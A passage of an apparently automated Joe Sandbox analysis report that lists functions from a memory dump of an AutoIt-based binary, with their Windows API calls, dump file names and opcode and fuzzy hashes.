                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1946975507-0
                                                                                                                                                                              • Opcode ID: 67098c7702527913cf510124f0dc0adc2025900caa7d7ff18a7fdbb1f76cf9c6
                                                                                                                                                                              • Instruction ID: 3b1b4582cd4160b63c42acae9edd2479d7d5446eeb08cfca9cc93e3937dee164
                                                                                                                                                                              • Opcode Fuzzy Hash: 67098c7702527913cf510124f0dc0adc2025900caa7d7ff18a7fdbb1f76cf9c6
                                                                                                                                                                              • Instruction Fuzzy Hash: 42E0ED31504240AFEB215F74BC4ABD93F31AB66336F14826AF669581E2C7724954EB21
                                                                                                                                                                              Function 004EC066 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004EC071
                                                                                                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 004EC07D
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004EC086
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004EC08E
                                                                                                                                                                                • Part of subcall function 004EB850: GetProcessHeap.KERNEL32(00000000,?,004EB574), ref: 004EB857
                                                                                                                                                                                • Part of subcall function 004EB850: HeapFree.KERNEL32(00000000), ref: 004EB85E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 146765662-0
                                                                                                                                                                              • Opcode ID: 2da55f3ed7dc34b8565d71f5dd02214dc931578b97fc778b8447042e1cd852f9
                                                                                                                                                                              • Instruction ID: 8fd3ac6ea98500d36dd222047dd9cd8d460a78c6b493ca63ee9ff414340104e1
                                                                                                                                                                              • Opcode Fuzzy Hash: 2da55f3ed7dc34b8565d71f5dd02214dc931578b97fc778b8447042e1cd852f9
                                                                                                                                                                              • Instruction Fuzzy Hash: A7E0E636104006BFCB012FA6FD08859FF3AFF593213108225F61581670CB326435FBA0
                                                                                                                                                                              Function 0052C0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2889604237-0
                                                                                                                                                                              • Opcode ID: d0de5627ba42bf9402305f3b45bca74c0e25d7168bbfc8f67574697a417e15d6
                                                                                                                                                                              • Instruction ID: 6e725e31c197169e90fae7b12c6e1954b44813c224d16d997f2698548bf51c9b
                                                                                                                                                                              • Opcode Fuzzy Hash: d0de5627ba42bf9402305f3b45bca74c0e25d7168bbfc8f67574697a417e15d6
                                                                                                                                                                              • Instruction Fuzzy Hash: E8E01AB5500210EFDB005F71A84DA693FB5EB58350F11840AF85A87351DAB89985AB64
                                                                                                                                                                              Function 0052C0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2889604237-0
                                                                                                                                                                              • Opcode ID: eceac491b39c53043e84067fc4108b708c89146d81bd4a7af9f409e443a07999
                                                                                                                                                                              • Instruction ID: 1ff22da6df17c847a2f3b13784d86678bd1a29f8a7ed72a744fb3303827c5dff
                                                                                                                                                                              • Opcode Fuzzy Hash: eceac491b39c53043e84067fc4108b708c89146d81bd4a7af9f409e443a07999
                                                                                                                                                                              • Instruction Fuzzy Hash: A5E046B9500200EFDB005F71EC4DA693BB9EB5C360F11840AF95A8B310DBB89985AB64
                                                                                                                                                                              Function 004D4C3D Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __getptd_noexit.LIBCMT ref: 004D4C3E
                                                                                                                                                                                • Part of subcall function 004D86B5: GetLastError.KERNEL32(?,004D0127,004D88A3,004D4673,?,?,004D0127,?,004B125D,00000058,?,?), ref: 004D86B7
                                                                                                                                                                                • Part of subcall function 004D86B5: __calloc_crt.LIBCMT ref: 004D86D8
                                                                                                                                                                                • Part of subcall function 004D86B5: GetCurrentThreadId.KERNEL32 ref: 004D8701
                                                                                                                                                                                • Part of subcall function 004D86B5: SetLastError.KERNEL32(00000000,004D0127,004D88A3,004D4673,?,?,004D0127,?,004B125D,00000058,?,?), ref: 004D8719
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,004D4C1D), ref: 004D4C52
                                                                                                                                                                              • __freeptd.LIBCMT ref: 004D4C59
                                                                                                                                                                              • ExitThread.KERNEL32 ref: 004D4C61
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 408300095-0
                                                                                                                                                                              • Opcode ID: 5b5170c4937d9ca2180778bb0fca29ceffce0500b5dcf85e7df60cdd029a4346
                                                                                                                                                                              • Instruction ID: f575156d0940bd91715df297ca2f1de2821b3ea241ccd5e09c6a1a4920db78af
                                                                                                                                                                              • Opcode Fuzzy Hash: 5b5170c4937d9ca2180778bb0fca29ceffce0500b5dcf85e7df60cdd029a4346
                                                                                                                                                                              • Instruction Fuzzy Hash: 38D0A731402A514BC13127209D1E62E72705F51F39B02470FF075053E09F389C1596A9
                                                                                                                                                                              Function 00532350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                              • String ID: >$DEFINE
                                                                                                                                                                              • API String ID: 4104443479-1664449232
                                                                                                                                                                              • Opcode ID: 0acffda7807c671b9d86241ccfdae4fb34e7b1c789a6d04d30ed40833a383a9b
                                                                                                                                                                              • Instruction ID: 58e519e359d78b441a91f263b6fe08d150af4a8d0d33529ccac4baa79a94c419
                                                                                                                                                                              • Opcode Fuzzy Hash: 0acffda7807c671b9d86241ccfdae4fb34e7b1c789a6d04d30ed40833a383a9b
                                                                                                                                                                              • Instruction Fuzzy Hash: 46124B75A0060ADFCF24CF98C490AEDBBB1FF58310F25855AE859AB351D734AE81CB94
                                                                                                                                                                              Function 004EEAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 004EECA0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ContainedObject
                                                                                                                                                                              • String ID: AutoIt3GUI$Container
                                                                                                                                                                              • API String ID: 3565006973-3941886329
                                                                                                                                                                              • Opcode ID: 8f8857763cb97ff725330b37416b4e7cf353cd91c13169a53bb02e745ae6c4a0
                                                                                                                                                                              • Instruction ID: d93b2b7386716bd0673371752b52bce42f15c5f8cc3f6f5623ffc0872224e64e
                                                                                                                                                                              • Opcode Fuzzy Hash: 8f8857763cb97ff725330b37416b4e7cf353cd91c13169a53bb02e745ae6c4a0
                                                                                                                                                                              • Instruction Fuzzy Hash: 9A913770600602AFDB14CF66C884B6ABBF5BF48711F24856EF94ACB391DB75E841CB64
                                                                                                                                                                              Function 004FE704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B3BCF: _wcscpy.LIBCMT ref: 004B3BF2
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                              • __wcsnicmp.LIBCMT ref: 004FE785
                                                                                                                                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 004FE84E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                                              • String ID: LPT
                                                                                                                                                                              • API String ID: 3222508074-1350329615
                                                                                                                                                                              • Opcode ID: bd870b5bb6c387c711ddf9dbeb6fbf69b476528c6c33264ce6fa1072cd1f0942
                                                                                                                                                                              • Instruction ID: 2e94857dbd1719972605aeeba7efc918bf56a6169e1375c389f0c1ce2030878d
                                                                                                                                                                              • Opcode Fuzzy Hash: bd870b5bb6c387c711ddf9dbeb6fbf69b476528c6c33264ce6fa1072cd1f0942
                                                                                                                                                                              • Instruction Fuzzy Hash: 9C616175A00219AFCB14EB55C891EBEB7F4AF48310F00406EF606AB3A1DB78AE45CB55
                                                                                                                                                                              Function 004B1B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 004B1B83
                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 004B1B9C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 2783356886-2766056989
                                                                                                                                                                              • Opcode ID: 80e7e6e9b37234340b7b174d522111ddcf5d71f983c0e6b8dd2d060c62afa20e
                                                                                                                                                                              • Instruction ID: 348570ff887e0ad766ae4fc1b8b53849191e3c46c76df4d6672f9269889c155b
                                                                                                                                                                              • Opcode Fuzzy Hash: 80e7e6e9b37234340b7b174d522111ddcf5d71f983c0e6b8dd2d060c62afa20e
                                                                                                                                                                              • Instruction Fuzzy Hash: EB515971408744ABE360AF25D885FABBBE8FF98354F41484DF5C8410A2EFB5856CC76A
                                                                                                                                                                              Function 004FCE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B417D: __fread_nolock.LIBCMT ref: 004B419B
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004FCF49
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004FCF5C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscmp$__fread_nolock
                                                                                                                                                                              • String ID: FILE
                                                                                                                                                                              • API String ID: 4029003684-3121273764
                                                                                                                                                                              • Opcode ID: 4ac98a7750787fa9139d01f7ceed9dfbe015a695e311ff8b54887700a21c3950
                                                                                                                                                                              • Instruction ID: 0aa6eb66a3ac471882229a4fd6ab9166df3b66e5781b364c4a7577b84fd4d8e3
                                                                                                                                                                              • Opcode Fuzzy Hash: 4ac98a7750787fa9139d01f7ceed9dfbe015a695e311ff8b54887700a21c3950
                                                                                                                                                                              • Instruction Fuzzy Hash: D541E532A0021DBADF10DBA5CC85FEFBBB9AF89714F00046EF601A7181D7759A448B69
                                                                                                                                                                              Function 004D9AF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                                                                                                                                              • __getbuf.LIBCMT ref: 004D9B8A
                                                                                                                                                                              • __lseeki64.LIBCMT ref: 004D9BFA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                                                                              • String ID: pMN
                                                                                                                                                                              • API String ID: 3311320906-2130963613
                                                                                                                                                                              • Opcode ID: 6cfd6bc574cfd011a8110fc35f1c2151c438d0eec57ac75c9886156e8aa74346
                                                                                                                                                                              • Instruction ID: 1cbfb9cb814e982428d3eaf1433458556e0a2abdfd0fe2dbdfc88d102f5fd7cd
                                                                                                                                                                              • Opcode Fuzzy Hash: 6cfd6bc574cfd011a8110fc35f1c2151c438d0eec57ac75c9886156e8aa74346
                                                                                                                                                                              • Instruction Fuzzy Hash: 07412E71500B059ED7349B29D8B1A7B7BE4AB42320F04861FE4AACB3D1E77CEC418B19
                                                                                                                                                                              Function 0051A578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0051A668
                                                                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0051A67D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID: '
                                                                                                                                                                              • API String ID: 3850602802-1997036262
                                                                                                                                                                              • Opcode ID: cbe4e685e30cc7fb3f38beb8236185244d1992b7b9622475b94d38a7ead8d815
                                                                                                                                                                              • Instruction ID: d8d01ba99602949771ea763aeee4e61195e4251c2c070d44a396fa490d120bc1
                                                                                                                                                                              • Opcode Fuzzy Hash: cbe4e685e30cc7fb3f38beb8236185244d1992b7b9622475b94d38a7ead8d815
                                                                                                                                                                              • Instruction Fuzzy Hash: 6F411475A013099FEF15CFA8D880BDA7BB5FB08300F15046AE919EB381D770A985DFA1
                                                                                                                                                                              Function 00519567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 0051961B
                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00519657
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$DestroyMove
                                                                                                                                                                              • String ID: static
                                                                                                                                                                              • API String ID: 2139405536-2160076837
                                                                                                                                                                              • Opcode ID: 811f42ddff7e774e8034f79a44ce403f73a3b3cd38d0a69ad022d5cd20e361c7
                                                                                                                                                                              • Instruction ID: 59e327e739370cef72a18ce1d1652c9a9ab15f2af8c0c15890f54a8499a9e6bb
                                                                                                                                                                              • Opcode Fuzzy Hash: 811f42ddff7e774e8034f79a44ce403f73a3b3cd38d0a69ad022d5cd20e361c7
                                                                                                                                                                              • Instruction Fuzzy Hash: 0E31AD31100604AEEB109F64DC91FFB7BB9FF58764F008619F8A9C7190CA30AC91DB64
                                                                                                                                                                              Function 004F5B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 004F5BE4
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004F5C1F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoItemMenu_memset
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 2223754486-4108050209
                                                                                                                                                                              • Opcode ID: 662ab047968e313f3751781f4ad4d9584cfb6b2e0620f6e3311fa05bd9aa4582
                                                                                                                                                                              • Instruction ID: 537aae4a87b9d8314851fb48e2e8dbc38b530534c1784c02959ac1e22b53897b
                                                                                                                                                                              • Opcode Fuzzy Hash: 662ab047968e313f3751781f4ad4d9584cfb6b2e0620f6e3311fa05bd9aa4582
                                                                                                                                                                              • Instruction Fuzzy Hash: DF31D43160074DABDB248F99D885BBEBBF4AF06350F18001BEB86962A0D7789A44DB55
                                                                                                                                                                              Function 00506B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __snwprintf.LIBCMT ref: 00506BDD
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
